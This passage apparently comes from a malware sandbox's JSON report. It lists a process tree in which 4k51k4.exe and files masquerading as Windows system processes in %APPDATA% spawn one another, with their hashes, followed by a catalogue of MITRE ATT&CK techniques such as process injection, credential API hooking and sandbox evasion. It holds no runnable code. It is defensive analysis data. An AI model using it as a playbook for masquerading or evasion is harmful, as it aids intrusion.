"%WINDIR%\\4k51k4.exe", "sha256": "b3393b309d2d0acaa15df331542b3b90423cc78e970d81d88feb42c8ca3ceb6b"}, {"uid": "00000000-00005440", "parentuid": "00000000-00005188", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "ab1130d00f52368220c28b1b95d133932b3ba3d293d8b5465615c8885f422b11"}, {"uid": "00000000-00005592", "parentuid": "00000000-00005188", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "6f3c38fb7652a8cf4d5b6de9dc30f46f31a0f061af3790349aaa07b81c8837d2"}, {"uid": "00000000-00003392", "parentuid": "00000000-00005592", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "b3393b309d2d0acaa15df331542b3b90423cc78e970d81d88feb42c8ca3ceb6b"}, {"uid": "00000000-00004624", "parentuid": "00000000-00005592", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "ab1130d00f52368220c28b1b95d133932b3ba3d293d8b5465615c8885f422b11"}, {"uid": "00000000-00005848", "parentuid": "00000000-00005592", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "6f3c38fb7652a8cf4d5b6de9dc30f46f31a0f061af3790349aaa07b81c8837d2"}, {"uid": "00000000-00000620", "parentuid": "00000000-00005592", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "51525e611dea4cf889b0bd827c4b1d79ddd0ebb59f8fb3cc2c1d5aec93b2b0ca"}, {"uid": "00000000-00005260", "parentuid": "00000000-00005592", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "6a26d80251b0dd2c4bc69a50ba0fbcbccad80403718a5e4f57f985d9ca7ade81"}, {"uid": "00000000-00003120", "parentuid": "00000000-00005592", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "3d7e6e7e5960be71c90543d05762ad6b5738fc0289ea387cfcbb2a5bb55441a1"}, {"uid": "00000000-00005752", "parentuid": "00000000-00005592", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "0b843b3077f2e39b0c431e12cbd4dd16949a5803bd8d3a642c56b43225596efa"}, {"uid": "00000000-00005664", "parentuid": "00000000-00005188", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "51525e611dea4cf889b0bd827c4b1d79ddd0ebb59f8fb3cc2c1d5aec93b2b0ca"}, {"uid": "00000000-00005820", "parentuid": "00000000-00005664", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "b3393b309d2d0acaa15df331542b3b90423cc78e970d81d88feb42c8ca3ceb6b"}, {"uid": "00000000-00003840", "parentuid": "00000000-00005664", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "ab1130d00f52368220c28b1b95d133932b3ba3d293d8b5465615c8885f422b11"}, {"uid": "00000000-00005504", "parentuid": "00000000-00005664", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "6f3c38fb7652a8cf4d5b6de9dc30f46f31a0f061af3790349aaa07b81c8837d2"}, {"uid": "00000000-00005952", "parentuid": "00000000-00005664", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "51525e611dea4cf889b0bd827c4b1d79ddd0ebb59f8fb3cc2c1d5aec93b2b0ca"}, {"uid": "00000000-00003560", "parentuid": "00000000-00005664", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "6a26d80251b0dd2c4bc69a50ba0fbcbccad80403718a5e4f57f985d9ca7ade81"}, {"uid": "00000000-00001452", "parentuid": "00000000-00005664", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "3d7e6e7e5960be71c90543d05762ad6b5738fc0289ea387cfcbb2a5bb55441a1"}, {"uid": "00000000-00003536", "parentuid": "00000000-00005664", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "0b843b3077f2e39b0c431e12cbd4dd16949a5803bd8d3a642c56b43225596efa"}, {"uid": "00000000-00005248", "parentuid": "00000000-00005188", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "6a26d80251b0dd2c4bc69a50ba0fbcbccad80403718a5e4f57f985d9ca7ade81"}, {"uid": "00000000-00002732", "parentuid": "00000000-00005188", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "3d7e6e7e5960be71c90543d05762ad6b5738fc0289ea387cfcbb2a5bb55441a1"}, {"uid": "00000000-00001600", "parentuid": "00000000-00005188", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "0b843b3077f2e39b0c431e12cbd4dd16949a5803bd8d3a642c56b43225596efa"}, {"uid": "00000000-00003260", "parentuid": "00000000-00001600", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "b3393b309d2d0acaa15df331542b3b90423cc78e970d81d88feb42c8ca3ceb6b"}, {"uid": "00000000-00005888", "parentuid": "00000000-00001600", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "ab1130d00f52368220c28b1b95d133932b3ba3d293d8b5465615c8885f422b11"}, {"uid": "00000000-00004356", "parentuid": "00000000-00001600", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "6f3c38fb7652a8cf4d5b6de9dc30f46f31a0f061af3790349aaa07b81c8837d2"}, {"uid": "00000000-00004364", "parentuid": "00000000-00001600", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "51525e611dea4cf889b0bd827c4b1d79ddd0ebb59f8fb3cc2c1d5aec93b2b0ca"}, {"uid": "00000000-00004932", "parentuid": "00000000-00001600", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "6a26d80251b0dd2c4bc69a50ba0fbcbccad80403718a5e4f57f985d9ca7ade81"}, {"uid": "00000000-00002124", "parentuid": "00000000-00001600", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "3d7e6e7e5960be71c90543d05762ad6b5738fc0289ea387cfcbb2a5bb55441a1"}, {"uid": "00000000-00003508", "parentuid": "00000000-00001600", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "0b843b3077f2e39b0c431e12cbd4dd16949a5803bd8d3a642c56b43225596efa"}, {"uid": "00000000-00004972", "parentuid": "00000000-00005240", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "ab1130d00f52368220c28b1b95d133932b3ba3d293d8b5465615c8885f422b11"}, {"uid": "00000000-00004996", "parentuid": "00000000-00004972", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "b3393b309d2d0acaa15df331542b3b90423cc78e970d81d88feb42c8ca3ceb6b"}, {"uid": "00000000-00001256", "parentuid": "00000000-00004972", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "ab1130d00f52368220c28b1b95d133932b3ba3d293d8b5465615c8885f422b11"}, {"uid": "00000000-00004800", "parentuid": "00000000-00004972", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "6f3c38fb7652a8cf4d5b6de9dc30f46f31a0f061af3790349aaa07b81c8837d2"}, {"uid": "00000000-00000948", "parentuid": "00000000-00004972", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "51525e611dea4cf889b0bd827c4b1d79ddd0ebb59f8fb3cc2c1d5aec93b2b0ca"}, {"uid": "00000000-00005452", "parentuid": "00000000-00004972", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "6a26d80251b0dd2c4bc69a50ba0fbcbccad80403718a5e4f57f985d9ca7ade81"}, {"uid": "00000000-00002300", "parentuid": "00000000-00004972", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "3d7e6e7e5960be71c90543d05762ad6b5738fc0289ea387cfcbb2a5bb55441a1"}, {"uid": "00000000-00005956", "parentuid": "00000000-00004972", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "0b843b3077f2e39b0c431e12cbd4dd16949a5803bd8d3a642c56b43225596efa"}, {"uid": "00000000-00000640", "parentuid": "00000000-00005240", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "6f3c38fb7652a8cf4d5b6de9dc30f46f31a0f061af3790349aaa07b81c8837d2"}, {"uid": "00000000-00005068", "parentuid": "00000000-00005240", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "51525e611dea4cf889b0bd827c4b1d79ddd0ebb59f8fb3cc2c1d5aec93b2b0ca"}, {"uid": "00000000-00003520", "parentuid": "00000000-00005240", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "6a26d80251b0dd2c4bc69a50ba0fbcbccad80403718a5e4f57f985d9ca7ade81"}, {"uid": "00000000-00000920", "parentuid": "00000000-00003520", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "b3393b309d2d0acaa15df331542b3b90423cc78e970d81d88feb42c8ca3ceb6b"}, {"uid": "00000000-00005620", "parentuid": "00000000-00003520", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "ab1130d00f52368220c28b1b95d133932b3ba3d293d8b5465615c8885f422b11"}, {"uid": "00000000-00002720", "parentuid": "00000000-00003520", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "6f3c38fb7652a8cf4d5b6de9dc30f46f31a0f061af3790349aaa07b81c8837d2"}, {"uid": "00000000-00006048", "parentuid": "00000000-00003520", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "51525e611dea4cf889b0bd827c4b1d79ddd0ebb59f8fb3cc2c1d5aec93b2b0ca"}, {"uid": "00000000-00005728", "parentuid": "00000000-00003520", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "6a26d80251b0dd2c4bc69a50ba0fbcbccad80403718a5e4f57f985d9ca7ade81"}, {"uid": "00000000-00003380", "parentuid": "00000000-00003520", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "3d7e6e7e5960be71c90543d05762ad6b5738fc0289ea387cfcbb2a5bb55441a1"}, {"uid": "00000000-00003572", "parentuid": "00000000-00003520", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "0b843b3077f2e39b0c431e12cbd4dd16949a5803bd8d3a642c56b43225596efa"}, {"uid": "00000000-00003680", "parentuid": "00000000-00003520", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "1afb95180af7523ede67b960d02e47cb78cd70f781ead8d8c897d4a2568f5cc0"}, {"uid": "00000000-00001424", "parentuid": "00000000-00003520", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "3d7e6e7e5960be71c90543d05762ad6b5738fc0289ea387cfcbb2a5bb55441a1"}, {"uid": "00000000-00002640", "parentuid": "00000000-00005240", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "3d7e6e7e5960be71c90543d05762ad6b5738fc0289ea387cfcbb2a5bb55441a1"}, {"uid": "00000000-00004656", "parentuid": "00000000-00002640", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "b3393b309d2d0acaa15df331542b3b90423cc78e970d81d88feb42c8ca3ceb6b"}, {"uid": "00000000-00005208", "parentuid": "00000000-00002640", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "ab1130d00f52368220c28b1b95d133932b3ba3d293d8b5465615c8885f422b11"}, {"uid": "00000000-00006032", "parentuid": "00000000-00002640", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "6f3c38fb7652a8cf4d5b6de9dc30f46f31a0f061af3790349aaa07b81c8837d2"}, {"uid": "00000000-00005212", "parentuid": "00000000-00002640", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "51525e611dea4cf889b0bd827c4b1d79ddd0ebb59f8fb3cc2c1d5aec93b2b0ca"}, {"uid": "00000000-00004012", "parentuid": "00000000-00002640", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "6a26d80251b0dd2c4bc69a50ba0fbcbccad80403718a5e4f57f985d9ca7ade81"}, {"uid": "00000000-00004244", "parentuid": "00000000-00002640", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "3d7e6e7e5960be71c90543d05762ad6b5738fc0289ea387cfcbb2a5bb55441a1"}, {"uid": "00000000-00002752", "parentuid": "00000000-00002640", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "0b843b3077f2e39b0c431e12cbd4dd16949a5803bd8d3a642c56b43225596efa"}, {"uid": "00000000-00003688", "parentuid": "00000000-00002640", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "1afb95180af7523ede67b960d02e47cb78cd70f781ead8d8c897d4a2568f5cc0"}, {"uid": "00000000-00000908", "parentuid": "00000000-00005240", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "0b843b3077f2e39b0c431e12cbd4dd16949a5803bd8d3a642c56b43225596efa"}, {"uid": "00000000-00001412", "parentuid": "00000000-00005240", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "1afb95180af7523ede67b960d02e47cb78cd70f781ead8d8c897d4a2568f5cc0"}, {"uid": "00000000-00003464", "parentuid": "00000000-00001412", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "1afb95180af7523ede67b960d02e47cb78cd70f781ead8d8c897d4a2568f5cc0"}, {"uid": "00000000-00003928", "parentuid": "00000000-00001412", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "3d7e6e7e5960be71c90543d05762ad6b5738fc0289ea387cfcbb2a5bb55441a1"}, {"uid": "00000000-00000508", "parentuid": "00000000-00005240", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "3d7e6e7e5960be71c90543d05762ad6b5738fc0289ea387cfcbb2a5bb55441a1"}], "mitre_attcks": [{"tactic": "Initial Access", "technique": "Drive-by Compromise", "attck_id": "T1189", "attck_id_wiki": "https://attack.mitre.org/techniques/T1189", "suspicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 9}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Windows Management Instrumentation", "attck_id": "T1047", "attck_id_wiki": "https://attack.mitre.org/techniques/T1047", "suspicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 5}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 2, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Code Signing Policy Modification", "attck_id": "T1553.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Subvert Trust Controls", "attck_id": "T1553", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "suspicious_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Match Legitimate Name or Location", "attck_id": "T1036.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/005", "malicious_identifiers_count": 2, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 3, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 2, "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 3, "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 2, "informative_identifiers_count": 6}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": 